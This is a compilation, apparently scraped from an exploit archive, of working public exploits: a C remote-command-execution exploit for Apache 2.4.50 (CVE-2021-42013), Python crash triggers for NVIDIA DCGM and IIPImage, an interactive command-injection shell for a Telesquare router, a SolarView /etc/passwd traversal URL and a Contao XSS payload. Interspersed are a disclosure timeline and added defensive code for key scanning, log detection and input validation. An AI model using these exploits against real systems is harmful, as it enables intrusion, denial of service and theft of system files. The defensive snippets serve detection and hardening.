REPORT TIMELINE<br />==================<br />2021-08-26: Discovery of the vulnerability<br />2021-08-26: Sent notification to Reolink via their support channel<br />2021-08-26: Response from vendor asking for vulnerability details<br />2021-08-26: Sent all the vulnerability details<br />2021-08-31: Vendor is still looking into the issue<br />2021-09-03: Vendor states that the issue will be fixed by the end of September.<br />2021-10-01: Since no firmware has been released, we've sent another notification<br />2021-10-02: Vendor states that the new firmware is delayed<br />2022-02-01: Since there is still no fix, sent another notification<br />2022-02-02: Vendor states that the firmware with the fix hasn't been released yet.<br />2022-03-03: Since there is still no fix, sent another notification<br />2022-03-12: Vendor states they're still working on the issue (internal update awaits testing)<br />2022-05-24: Since there is still no fix, sent another notification<br />2022-05-24: Vendor states that the update still hasn't been released yet.<br />2022-06-01: Almost a year should be enough to fix this. Public disclosure.<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /><br /></code></pre>
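The advisory's finding is a private key sitting in the web server's document root (reachable as /self.key). The following is an added server-side audit, not part of the advisory and not vendor code: it walks a document root and flags files that carry PEM private-key headers or key-style extensions. The web root layout and the placeholder key in demo() are constructed for the example.

```python
import os
import re
import tempfile
from typing import List

# PEM headers that mark private-key material (constructed list). The advisory's
# file was /self.key; the extension set catches the obvious names as well.
PEM_KEY_RE = re.compile(
    rb"-----BEGIN (?:RSA |EC |DSA |OPENSSH |ENCRYPTED )?PRIVATE KEY-----")
KEY_EXTENSIONS = {".key", ".pem", ".p12", ".pfx", ".der"}


def looks_like_private_key(data: bytes) -> bool:
    """True if the leading bytes carry a PEM private-key header."""
    return PEM_KEY_RE.search(data[:4096]) is not None


def find_exposed_keys(webroot: str) -> List[str]:
    """Walk a web document root and return every file, relative to the root,
    that has a key-style extension or starts with PEM private-key material.
    Each relative path is exactly the URL path a client could request."""
    hits = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            full = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            try:
                with open(full, "rb") as fh:
                    head = fh.read(4096)
            except OSError:
                continue  # unreadable files cannot be served either
            if ext in KEY_EXTENSIONS or looks_like_private_key(head):
                hits.append(os.path.relpath(full, webroot))
    return sorted(hits)


def demo() -> List[str]:
    """Build a constructed web root shaped like the E1 Zoom's (index page plus a
    self.key beside it) and audit it. Returns the relative paths flagged."""
    root = tempfile.mkdtemp()
    # placeholder text in PEM framing; no real key material
    fake_key = (b"-----BEGIN RSA PRIVATE KEY-----\n"
                b"PLACEHOLDER\n-----END RSA PRIVATE KEY-----\n")
    with open(os.path.join(root, "self.key"), "wb") as fh:
        fh.write(fake_key)
    with open(os.path.join(root, "index.html"), "wb") as fh:
        fh.write(b"<html>camera ui</html>")
    os.makedirs(os.path.join(root, "static"))
    with open(os.path.join(root, "static", "notes.txt"), "wb") as fh:
        fh.write(fake_key)  # key material hiding under a harmless name
    return find_exposed_keys(root)
```

A hit means the key has to be treated as compromised: generate a new one and store it outside the document root, because rotating a key that stays at a servable path does not close the exposure.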
<pre><code>#include <stdio.h><br />#include <stdlib.h><br />#include <stdbool.h><br />#include <string.h><br />#include <curl/curl.h><br /><br />/* Apache 2.4.50 exploit (CVE-2021-42013)<br /> * Author: Vilius Povilaika<br /> * Website: www.povilaika.com */<br /><br />// compile: $ gcc cve-2021-42013.c -lcurl -o cve-2021-42013<br /><br />int usage(char* prog)<br />{<br />    printf("Usage: %s <host> <exec>\n", prog);<br />    printf(" - %s https://127.0.0.1 \"uname -a\"\n", prog);<br />    return 0;<br />}<br /><br />bool error(const char* reason)<br />{<br />    printf("[ERR] Critical error - %s\n", reason);<br />    return false;<br />}<br /><br />/* growable buffer that collects the HTTP response body */<br />struct callback_result {<br />    char* data;<br />    size_t size;<br />};<br /><br />/* libcurl write callback: append the received chunk to the buffer.<br /> * Returning fewer bytes than received makes libcurl abort the transfer. */<br />static size_t callback(void* pointer, size_t size, size_t nmemb, void* data)<br />{<br />    struct callback_result *memory = (struct callback_result *)data;<br />    size_t realsize = size * nmemb;<br />    char* ptr = realloc(memory->data, memory->size + realsize + 1);<br />    if (ptr == NULL)<br />        return 0; /* out of memory: abort the transfer */<br />    memory->data = ptr;<br />    memcpy(&(memory->data[memory->size]), pointer, realsize);<br />    memory->size += realsize;<br />    memory->data[memory->size] = 0;<br />    return realsize;<br />}<br /><br />bool exploit(void* result, char* host, char* exec)<br />{<br />    CURL *curl = curl_easy_init();<br />    if (curl == NULL)<br />        return error("curl_easy_init() failed");<br />    /* each ".%%32%65" segment double-decodes to ".." (CVE-2021-42013) */<br />    char url[512];<br />    snprintf(url, sizeof(url), "%s/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh", host);<br />    curl_easy_setopt(curl, CURLOPT_URL, url);<br />    char payload[512];<br />    snprintf(payload, sizeof(payload), "echo Content-Type: text/plain; echo; %s", exec);<br />    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload);<br />    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, callback);<br />    curl_easy_setopt(curl, CURLOPT_WRITEDATA, result);<br />    CURLcode res = curl_easy_perform(curl);<br />    curl_easy_cleanup(curl);<br />    if (res != CURLE_OK)<br />        return error(curl_easy_strerror(res));<br />    return true;<br />}<br /><br />int main(int argc, char* argv[])<br />{<br />    if (argc != 3)<br />        return usage(argv[0]);<br />    curl_global_init(CURL_GLOBAL_DEFAULT);<br />    struct callback_result result = {0};<br />    bool res = exploit(&result, argv[1], argv[2]);<br />    if (res)<br />        printf("[+] Exploit finished successfully, check output\n");<br />    else<br />        printf("[-] Exploit failed, check output\n");<br />    printf(" \n%s\n", result.data ? result.data : "");<br />    free(result.data);<br />    curl_global_cleanup();<br />    return 0;<br />}<br /></code></pre>
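The request the exploit above builds is recognisable in server logs: "%%32%65" decodes to "%2e" after one pass and to "." after a second, so the ".." segments only appear once a path has been decoded twice. The following is an added detection example, not code from the exploit author or from Apache: it decodes request paths until they stop changing, counts the passes, and reports traversal into /cgi-bin/. The access-log lines are constructed samples.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample lines in Apache combined-log shape (not from the page).
SAMPLE_LOG = """\
10.0.0.5 - - [02/Jun/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.7 - - [02/Jun/2022:10:00:02 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 77
10.0.0.8 - - [02/Jun/2022:10:00:03 +0000] "GET /cgi-bin/.%2e/.%2e/etc/passwd HTTP/1.1" 403 199
10.0.0.9 - - [02/Jun/2022:10:00:04 +0000] "GET /docs/a..b/file HTTP/1.1" 200 10
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def full_decode(path: str, max_rounds: int = 3) -> Tuple[str, int]:
    """Percent-decode until the string stops changing.
    Returns (decoded, rounds_needed). A path that needs more than one round
    was encoded twice, which normal clients never do."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
        rounds += 1
    return path, rounds


def classify(line: str) -> Optional[str]:
    """Return a finding label for one log line, or None if it looks benign."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    decoded, rounds = full_decode(m.group("path"))
    # compare whole segments: "a..b" is a legitimate name, ".." is traversal
    segments = decoded.split("/")
    has_traversal = ".." in segments
    if has_traversal and rounds > 1:
        return "double-encoded traversal (CVE-2021-42013 pattern)"
    if has_traversal and decoded.startswith("/cgi-bin/"):
        return "single-encoded traversal under /cgi-bin/"
    if has_traversal:
        return "path traversal"
    return None


def scan(log: str) -> List[Tuple[str, str]]:
    """Run classify() over every line; returns (client_ip, label) pairs."""
    findings = []
    for line in log.splitlines():
        label = classify(line)
        if label:
            findings.append((line.split(" ", 1)[0], label))
    return findings
```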
<pre><code>#!/usr/bin/python3<br /># -*- coding: UTF-8 -*-<br />#<br /># heart.py<br />#<br /># NVIDIA Data Center GPU Manager Remote Memory Corruption Vulnerability<br />#<br /># Jeremy Brown [jbrown3264/gmail]<br />#<br /># NVIDIA DCGM runs on machines with NVIDIA GPUs to gather telemetry and GPU health<br /># data. nv-hostengine is a daemon that by default listens on the loopback interface,<br /># but can also listen on the network for requests coming in on port 5555 (remote mgmt).<br /># A native client named DCGMI allows users to make requests to the daemon to support<br /># a variety of functions. Malformed packets can cause the daemon (running as root<br /># or user account) to crash or potentially result in code execution.<br />#<br /># More info: https://docs.nvidia.com/datacenter/dcgm/latest/index.html<br />#<br /># Tested on Ubuntu 20.04 x64 with package datacenter-gpu-manager v2.3.1 (< v2.3.5 affected)<br />#<br /># $ ./heart.py 10.0.0.201 --trigger pkt3_mem<br />#<br /># $ gdb `which nv-hostengine`<br /># (gdb) r -b ALL -n<br /># nv-hostengine running as non-root. 
Some functionality will be limited.<br /># Started host engine version 2.3.1 using port number: 5555<br /># ...<br /># Thread 2 "nv-hostengine" received signal SIGSEGV, Segmentation fault.<br />#<br /># (gdb) i r<br /># rax 0x7ffbb3dbd010 140719031046160<br /># rbx 0x7ffff771ac70 140737344810096<br /># rcx 0x7ffbb3dbd010 140719031046160<br /># rdx 0x424242420 17786217504<br /># rsi 0x7ffff771aee4 140737344810724<br /># rdi 0x7ffbb3dbd010 140719031046160<br /># rbp 0x7ffff771ac40 0x7ffff771ac40<br /># rsp 0x7ffff771abe8 0x7ffff771abe8<br /># r8 0x424242420 17786217504<br /># r9 0x0 0<br /># r10 0x7ffbb3dbd010 140719031046160<br />#<br /># CVE‑2022‑21820<br />#<br /><br />import os<br />import sys<br />import argparse<br />import time<br />import shutil<br />import signal<br />import socket<br /><br />DEFAULT_PORT = 5555<br /><br />PKT_START = b'\xad\xbc\xbc\xad'<br /><br />#<br /># Trigger #1: Memory Corruption via malformed packet 3<br />#<br />TRIGGER_ONE_PKT_1 = PKT_START + \<br /> b'\x01\x00\x00\x00\x11\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\x0f\x08\x03\x10\x03\x18\x00\x28\x00\x42\x05\xc2\x01\x02\x08\x00'<br /><br />TRIGGER_ONE_PKT_2 = PKT_START + \<br /> b'\x01\x00\x00\x00\x1a\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x0a\x18\x08\x03\x10\x03\x18\x00\x28\x00\x42\x05\xc2\x01\x02\x08\x00\x48\xa4\xec\xc4\x94\x81\x83\xf5\x02'<br /><br /># 0x84 maps to 'B' here and crashes with rdx/r8=0x424242420<br />TRIGGER_ONE_PKT_3 = PKT_START + \<br /> b'\x03\x00\x00\x00\x3a\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\xb7\x06\x08\x38\x10\x03\x18\x00\x28\x00\x42\xac\x06\xaa\x01\xa8\x06\x28\x03\x00\x01\x00' + \<br /> b'\x84' * 51 + \<br /> b'\x00' * 488 + \<br /> b'\x19\x00\x00\x00\x9e\x00\x9f\x00\xa4\x00\xa0\x00\xa3\x00\xa2\x00\xa1\x00\x82\x00\x36\x00\x55\x00\x52\x00\x33\x00\x32\x00\x35\x00\x39\x00\x3a\x00\x3b\x00\x5a\x00\xfa\x00\xfc\x00\xfb\x00\x01\x00\xf4\x01\x42\x00\x43' + \<br /> b'\x00' * 207 + \<br /> b'\x01\x00\x00\x00'<br /><br />#<br /># Trigger #2: NULL 
ptr write via malformed packet 4<br />#<br />TRIGGER_TWO_PKT_1 = TRIGGER_ONE_PKT_1<br /><br />TRIGGER_TWO_PKT_2 = TRIGGER_ONE_PKT_2<br /><br />TRIGGER_TWO_PKT_3 = PKT_START + \<br />    b'\x03\x00\x00\x00\x3a\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\xb7\x06\x08\x38\x10\x03\x18\x00\x28\x00\x42\xac\x06\xaa\x01\xa8\x06\x28\x03\x00\x01' + \<br />    b'\x00' * 12 + \<br />    b'\x01\x00\x00\x00\x01' + \<br />    b'\x00' * 523 + \<br />    b'\x19\x00\x00\x00\x9e\x00\x9f\x00\xa4\x00\xa0\x00\xa3\x00\xa2\x00\xa1\x00\x82\x00\x36\x00\x55\x00\x52\x00\x33\x00\x32\x00\x35\x00\x39\x00\x3a\x00\x3b\x00\x5a\x00\xfa\x00\xfc\x00\xfb\x00\x01\x00\xf4\x01\x42\x00\x43' + \<br />    b'\x00' * 207 + \<br />    b'\x01\x00\x00\x00'<br /><br /># 0x79 triggers crash<br />TRIGGER_TWO_PKT_4 = PKT_START + \<br />    b'\x04\x00\x00\x00\x1c\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\x1a\x08\x04\x10\x03\x18' + \<br />    b'\xff' * 9 + \<br />    b'\x01' + \<br />    b'\x79' + \<br />    b'\x00\x42\x07\xd2\x01\x04\x08\x03\x10\x00'<br /><br />class Heart(object):<br />    def __init__(self, args):<br />        self.host = args.host<br />        self.trigger = args.trigger<br /><br />    def run(self):<br />        if self.trigger is None:<br />            print("error: choose which bug to use via --trigger")<br />            return -1<br /><br />        sock = self.getSock()<br /><br />        if sock is None:<br />            return -1<br /><br />        try:<br />            sock.connect((self.host, DEFAULT_PORT))<br />        except Exception as error:<br />            print("connect() failed: %s\n" % error)<br />            return -1<br /><br />        if self.trigger == 'pkt3_mem':<br />            if self.sendPacket(sock, TRIGGER_ONE_PKT_1) < 0:<br />                print("failed to send/recv packet 1\n")<br />                return -1<br /><br />            if self.sendPacket(sock, TRIGGER_ONE_PKT_2) < 0:<br />                print("failed to send/recv packet 2\n")<br />                return -1<br /><br />            if self.sendPacket(sock, TRIGGER_ONE_PKT_3) < 0:<br />                print("failed to send/recv packet 3\n")<br />                return -1<br /><br />        if self.trigger == 'pkt4_null':<br />            if self.sendPacket(sock, TRIGGER_TWO_PKT_1) < 0:<br />                print("failed to send/recv packet 1\n")<br />                return -1<br /><br />            if self.sendPacket(sock, TRIGGER_TWO_PKT_2) < 0:<br />                print("failed to send/recv packet 2\n")<br />                return -1<br /><br />            if self.sendPacket(sock, TRIGGER_TWO_PKT_3) < 0:<br />                print("failed to send/recv packet 3\n")<br />                return -1<br /><br />            if self.sendPacket(sock, TRIGGER_TWO_PKT_4) < 0:<br />                print("failed to send/recv packet 4\n")<br />                return -1<br /><br />        print("done\n")<br /><br />        return 0<br /><br />    def getSock(self):<br />        try:<br />            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />            sock.settimeout(2)<br />        except Exception as error:<br />            print("socket() failed: %s\n" % error)<br />            return None<br /><br />        return sock<br /><br />    def sendPacket(self, sock, pkt):<br />        try:<br />            sock.sendall(pkt)  # sendall() retries until the whole packet is written<br />        except Exception as error:<br />            print("socket send error: %s\n" % error)<br />            return -1<br /><br />        try:<br />            sock.recv(256)<br />        except Exception as error:<br />            # print("socket recv error: %s\n" % error)<br />            return 0  # expected for pkt3_mem: the daemon has already crashed<br /><br />        return 0<br /><br /># SIGINT handler: signal handlers receive (signum, frame)<br />def signalExit(signum, frame):<br />    sys.exit(-1)<br /><br />def arg_parse():<br />    parser = argparse.ArgumentParser()<br /><br />    parser.add_argument("host",<br />                        type=str,<br />                        help="target host")<br /><br />    parser.add_argument("--trigger",<br />                        type=str,<br />                        choices=['pkt3_mem', 'pkt4_null'],<br />                        help="which bug to trigger")<br /><br />    args = parser.parse_args()<br /><br />    return args<br /><br />def main():<br />    signal.signal(signal.SIGINT, signalExit)<br /><br />    args = arg_parse()<br /><br />    rh = Heart(args)<br /><br />    result = rh.run()<br /><br />    # run() returns -1 on failure, so exit non-zero on a negative result<br />    if result < 0:<br />        sys.exit(-1)<br /><br />if __name__ == '__main__':<br />    main()<br /></code></pre>
<pre><code>#!/usr/bin/python3<br /># -*- coding: UTF-8 -*-<br />#<br /># thiel.py<br />#<br /># IIPImage Multiple Remote Memory Corruption Vulnerabilities<br />#<br /># Jeremy Brown [jbrown3264/gmail]<br />#<br /># IIPImage is distributed with a server that enables advanced, high-performance<br /># image manipulation for web-based streaming and viewing of high resolution images.<br /># The server component called iipsrv.fcgi processes requests from users and passes<br /># them to command handlers. Several crashes including an integer overflow were<br /># discovered by sending malformed requests to the server, allowing remote users<br /># without authentication to perform denial-of-service attacks or, with crafted<br /># input, potentially gain remote code execution as the server's running user.<br />#<br /># Tested on Ubuntu 20.04 with NGINX fastcgi_pass localhost:9000 configuration<br />#<br /># Demo<br />#<br /># $ ./thiel.py http://10.0.0.201 --trigger iiif<br />#<br /># (gdb) r --bind 0.0.0.0:9000 # 9000 for nginx comms, port 80 externally<br /># ...<br />#<br /># Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault.<br /># __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319<br /># (gdb) i r<br /># rax 0x7ffef6d50b68 140733039577960<br /># rbx 0xffffffff 4294967295<br /># rcx 0xb3 179<br /># rdx 0x6 6<br /># rsi 0x5555556ae20d 93824993649165<br /># rdi 0x7ffef6d50b68 140733039577960<br /># rbp 0x7fffffffc690 0x7fffffffc690<br /># rsp 0x7fffffffc4b8 0x7fffffffc4b8<br /># r8 0x0 0<br /># r9 0x0 0<br /># r10 0x55555564f4e0 93824993260768<br /># r11 0x7ffef6d50b68 140733039577960<br /># r12 0xb58 2904<br /># r13 0x81 129<br /># r14 0x1e4 484<br /># r15 0x8 8<br /># rip 0x7ffff7a53708 0x7ffff7a53708 <__memmove_avx_unaligned_erms+152><br />#<br /># => 0x7ffff7a53708 <__memmove_avx_unaligned_erms+152>: mov ecx,DWORD PTR [rsi+rdx*1-0x4]<br />#<br /># 0 __memmove_avx_unaligned_erms () at 
../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319<br /># 1 0x0000555555573b5c in memcpy (__len=6, __src=<optimized out>, __dest=<optimized out>) at /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34<br /># 2 TileManager::getRegion (this=this@entry=0x7fffffffc7d0, res=res@entry=0, seq=0, ang=90, layers=0, x=<optimized out>, y=<optimized out>, width=<optimized out>, height=<optimized out>) at TileManager.cc:470<br /># 3 0x000055555558c914 in CVT::send (this=this@entry=0x7fffffffd390, session=session@entry=0x7fffffffd8b0) at CVT.cc:222<br /># 4 0x000055555559a06e in IIIF::run (this=0x5555555e2e20, session=0x7fffffffd8b0, src=...) at IIIF.cc:656<br /># 5 0x0000555555566cf4 in main (argc=<optimized out>, argv=<optimized out>) at Main.cc:741<br />#<br /># Fixes<br /># - commits 4ed59265fbbd636dc2fbbf325f8ea37ed300a6d9, 882925b295a80ec992063deffc2a3b0d803c3195<br />#<br /># CVE-2021-46389<br />#<br /><br />import os<br />import sys<br />import argparse<br />import signal<br />import requests<br /><br />PATH = '/fcgi-bin/iipsrv.fcgi'<br /><br />#<br /># There are also many params for some functions like fif (obj, qlt, sds, cnt,<br /># cvt, wid, rgn, etc.), so the code definitely needs lots of input validation.<br />#<br />QUERY_FIF = '?fif='<br />QUERY_IIIF = '?iiif='<br />QUERY_SPECTRA = '?spectra='<br /><br />#<br /># Some bugs require a valid file (eg. tiled TIF) to be present on the server (eg. 
IIIF big region)<br />#<br /># sample: https://openslide.cs.cmu.edu/download/openslide-testdata/Generic-TIFF/CMU-1.tiff<br />#<br />VALID_FILE = '/var/www/test.tif'<br /><br />### BUGS ###<br />#<br /># Bug #1: Integer overflow @ TileManager::getRegion()<br />#<br /># Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault.<br /># __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319<br />#<br /># REQ = QUERY_IIIF + VALID_FILE + '/full,32883,500,500/256,/0/default.jpg' # image<br /># REQ = QUERY_IIIF + VALID_FILE + '/full,32884,500,500/256,/0/default.jpg' # image error<br />REQ_IIIF = QUERY_IIIF + VALID_FILE + '/full,32912,500,500/256,/0/default.jpg' # SIGSEGV<br /># REQ_FIF_WID = QUERY_FIF + VALID_FILE + '&wid=652455&cvt=jpeg' # SIGSEGV (starts at CVT::run instead of IIIF:run)<br /><br />#<br /># Bug #2: NULL ptr deref @ SPECTRA::run<br />#<br /># Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault.<br /># SPECTRA::run (this=0x5555555e2f70, session=0x7fffffffd8b0, argument=...) 
at IIPImage.h:335<br /># 335 unsigned int getTileWidth() { return tile_width; };<br />#<br />REQ_SPECTRA = QUERY_SPECTRA + 'x' # no valid file necessary<br /><br />#<br /># Bug #3: Another crash @ JTL::run<br />#<br /># Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault.<br /># JTL::send (this=this@entry=0x5555555e3200, session=session@entry=0x7fffffffd8c0, resolution=resolution@entry=129165, tile=tile@entry=1) at IIPImage.h:324<br /># 324 unsigned int getImageWidth( int n=0 ) { return image_widths[n]; };<br />#<br />REQ_FIF_JTL = QUERY_FIF + VALID_FILE + '&jtl=129500,1' # try larger value if no crash<br />#<br />### END BUGS ###<br /><br /><br />class Thiel(object):<br />    def __init__(self, args):<br />        self.host = args.host<br />        self.trigger = args.trigger<br /><br />    def run(self):<br />        if self.trigger is None:<br />            print("error: choose which bug to use via --trigger")<br />            return -1<br /><br />        if self.trigger == 'iiif':<br />            return self.sendRequest(self.host, REQ_IIIF)<br /><br />        if self.trigger == 'spectra':<br />            return self.sendRequest(self.host, REQ_SPECTRA)<br /><br />        if self.trigger == 'fif_jtl':<br />            return self.sendRequest(self.host, REQ_FIF_JTL)<br /><br />        return 0<br /><br />    def sendRequest(self, host, req):<br />        session = requests.Session()<br /><br />        try:<br />            resp = session.get(host + PATH + req)<br />        except Exception as error:<br />            print("Error: %s" % error)<br />            return -1<br /><br />        # nginx answers 502 once the FastCGI backend has died<br />        if b'502 Bad Gateway' in resp.content:<br />            print("done\n")<br />            return 0<br />        else:<br />            print("[-] iipsrv still appears to be up\n")<br />            return -1<br /><br /># SIGINT handler: signal handlers receive (signum, frame)<br />def signalExit(signum, frame):<br />    sys.exit(-1)<br /><br />def arg_parse():<br />    parser = argparse.ArgumentParser()<br /><br />    parser.add_argument("host",<br />                        type=str,<br />                        help="target host")<br /><br />    parser.add_argument("--trigger",<br />                        type=str,<br />                        choices=['iiif', 'spectra', 'fif_jtl'],<br />                        help="which bug to trigger")<br /><br />    args = parser.parse_args()<br /><br />    return args<br /><br />def main():<br />    signal.signal(signal.SIGINT, signalExit)<br /><br />    args = arg_parse()<br /><br />    pt = Thiel(args)<br /><br />    result = pt.run()<br /><br />    # run() returns -1 on failure, so exit non-zero on a negative result<br />    if result < 0:<br />        sys.exit(-1)<br /><br />if __name__ == '__main__':<br />    main()<br /></code></pre>
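Two of the crashes above come down to unchecked request parameters: an IIIF region whose offset lies far outside the image (bug #1, the memcpy in TileManager::getRegion) and a jtl resolution index used directly to index image_widths[] (bug #3). The following is an added validation example, not thiel.py's code and not the iipsrv fix referenced in the header: it parses both parameters against an image's geometry and rejects or clips anything that would reach the copy with a bogus offset or length. The pyramid geometry is constructed, and the checks are this example's own assumptions about what a safe handler needs.

```python
from dataclasses import dataclass
from typing import Tuple

# the server's C++ handlers hold these values in int/unsigned int (see the
# getImageWidth/getTileWidth signatures in the backtraces above)
INT_MAX = 2**31 - 1


@dataclass(frozen=True)
class ImageInfo:
    widths: Tuple[int, ...]    # widths[i] is the pixel width of resolution i
    heights: Tuple[int, ...]   # heights[i] is the pixel height of resolution i
    tile_width: int
    tile_height: int

    @property
    def num_resolutions(self) -> int:
        return len(self.widths)


class BadRequest(ValueError):
    """Raised for any parameter that must be rejected rather than clipped."""


def parse_region(region: str, img: ImageInfo) -> Tuple[int, int, int, int]:
    """Parse an IIIF region ("full" or "x,y,w,h") against the full-resolution
    image (level 0) and return a region guaranteed to lie inside it."""
    full_w, full_h = img.widths[0], img.heights[0]
    if region == "full":
        return 0, 0, full_w, full_h
    parts = region.split(",")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise BadRequest("region must be 'full' or four unsigned integers")
    x, y, w, h = (int(p) for p in parts)
    if max(x, y, w, h) > INT_MAX:
        raise BadRequest("region value does not fit the server's integer type")
    # An offset at or past the edge leaves nothing to copy; this is the shape
    # of request that reaches memcpy with a nonsensical length in bug #1.
    if x >= full_w or y >= full_h or w == 0 or h == 0:
        raise BadRequest("region lies outside the image")
    # IIIF permits regions that run past the edge: clip them explicitly instead
    # of letting width/height arithmetic wrap around later.
    w = min(w, full_w - x)
    h = min(h, full_h - y)
    return x, y, w, h


def parse_jtl(arg: str, img: ImageInfo) -> Tuple[int, int]:
    """Validate a 'jtl=resolution,tile' argument: the resolution must index the
    resolution table and the tile must exist at that resolution (bug #3)."""
    parts = arg.split(",")
    if len(parts) != 2 or not all(p.isdigit() for p in parts):
        raise BadRequest("jtl must be 'resolution,tile'")
    res, tile = int(parts[0]), int(parts[1])
    if res >= img.num_resolutions:
        raise BadRequest(f"resolution {res} out of range")
    cols = -(-img.widths[res] // img.tile_width)     # ceiling division
    rows = -(-img.heights[res] // img.tile_height)
    if tile >= cols * rows:
        raise BadRequest(f"tile {tile} out of range for resolution {res}")
    return res, tile


def rejected(fn, *args) -> bool:
    """True if fn(*args) raises BadRequest; exercises the failure paths."""
    try:
        fn(*args)
    except BadRequest:
        return True
    return False


# Constructed geometry: a 3-level pyramid of a 4000x3000 image with 256px tiles.
SAMPLE_IMAGE = ImageInfo(widths=(4000, 2000, 1000), heights=(3000, 1500, 750),
                         tile_width=256, tile_height=256)
```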
<pre><code>#!/usr/bin/python3<br /><br /># Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection<br /># Date: 24th May 2022<br /># Exploit Author: Bryan Leong <NobodyAtall><br /># Vendor Homepage: http://telesquare.co.kr/<br /># CVE : CVE-2021-46422<br /># Authentication Required: No<br /><br />import requests<br />import argparse<br />import sys<br />from xml.etree import ElementTree<br /><br />def sysArgument():<br />    ap = argparse.ArgumentParser()<br />    ap.add_argument("--host", required=True, help="target hostname/IP")<br />    args = vars(ap.parse_args())<br />    return args['host']<br /><br />def checkHost(host):<br />    url = "http://" + host<br /><br />    print("[*] Checking whether the host is alive...")<br /><br />    try:<br />        requests.get(url, timeout=10)<br />        print("[*] The host is alive.")<br />    except requests.exceptions.RequestException as err:<br />        # covers timeouts as well as connection errors<br />        raise SystemExit(err)<br /><br />def exploit(host):<br />    url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd="<br /><br />    # check whether the CGI script exists<br />    rsl = requests.get(url, timeout=10)<br /><br />    if rsl.status_code == 200:<br />        print("[*] CGI script exists!")<br />        print("[*] Injecting a test shell command.")<br /><br />        # 1st test: inject the id command<br />        cmd = "id"<br />        cmdRet = []<br /><br />        try:<br />            rsl = requests.get(url + cmd, stream=True, timeout=10)<br />            xmlparser = ElementTree.iterparse(rsl.raw)<br /><br />            for event, elem in xmlparser:<br />                if elem.tag == 'CmdResult':<br />                    cmdRet.append(elem.text or '')<br />        except (ElementTree.ParseError, requests.exceptions.RequestException):<br />            print("[!] No XML returned from CGI script. Possibly not vulnerable to the exploit")<br />            sys.exit(0)<br /><br />        if len(cmdRet) != 0:<br />            print("[*] There's a response from the CGI script!")<br />            print('[*] System ID: ' + cmdRet[0].strip())<br /><br />            print("[*] Spawning shell. Type .exit to exit the shell", end="\n\n")<br />            # start shell iteration<br />            while True:<br />                cmdInput = input("[SDT-CW3B1 Shell]# ")<br /><br />                if cmdInput == ".exit":<br />                    print("[*] Exiting shell.")<br />                    sys.exit(0)<br /><br />                rsl = requests.get(url + cmdInput, stream=True, timeout=10)<br />                xmlparser = ElementTree.iterparse(rsl.raw)<br /><br />                for event, elem in xmlparser:<br />                    if elem.tag == 'CmdResult':<br />                        print((elem.text or '').strip())<br /><br />                print('\n')<br /><br />        else:<br />            print("[!] Something doesn't look right. Please check the request packet using burpsuite/wireshark/etc.")<br />            sys.exit(0)<br /><br />    else:<br />        print("[!] CGI script not found.")<br />        print(rsl.status_code)<br />        sys.exit(0)<br /><br />def main():<br />    host = sysArgument()<br /><br />    checkHost(host)<br />    exploit(host)<br /><br />if __name__ == "__main__":<br />    main()<br /></code></pre>
<pre><code># Exploit Title: SolarView Compact 6.00 - Directory Traversal<br /># Date: 2022-05-15<br /># Exploit Author: Ahmed Alroky<br /># Author Company : Aiactive<br /># Author linkedin profile : https://www.linkedin.com/in/ahmedalroky/<br /># Version: ver.6.00<br /># Vendor home page : https://www.contec.com/<br /># Authentication Required: No<br /># CVE : CVE-2022-29298<br /><br /># Tested on: Windows<br /><br /># Exploit: http://IP_ADDRESS/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg<br /><br /></code></pre>
<pre><code># Exploit Title: Contao 4.13.2 - Cross-Site Scripting (XSS)<br /># Google Dork: NA<br /># Date: 04/28/2022<br /># Exploit Author: Chetanya Sharma @AggressiveUser<br /># Vendor Homepage: https://contao.org/en/<br /># Software Link: https://github.com/contao/contao/releases/tag/4.13.2<br /># Version: [ 4.13.2 ] <br /># Tested on: [KALI OS]<br /># CVE : CVE-2022-1588<br /># References: <br />- https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/<br />- https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2<br />- https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html<br />---------------<br /><br />Steps to reproduce:<br />Navigate to the below URL<br />URL: https://localhost/contao/"><svg//onload=alert(112233)><br /><br /></code></pre>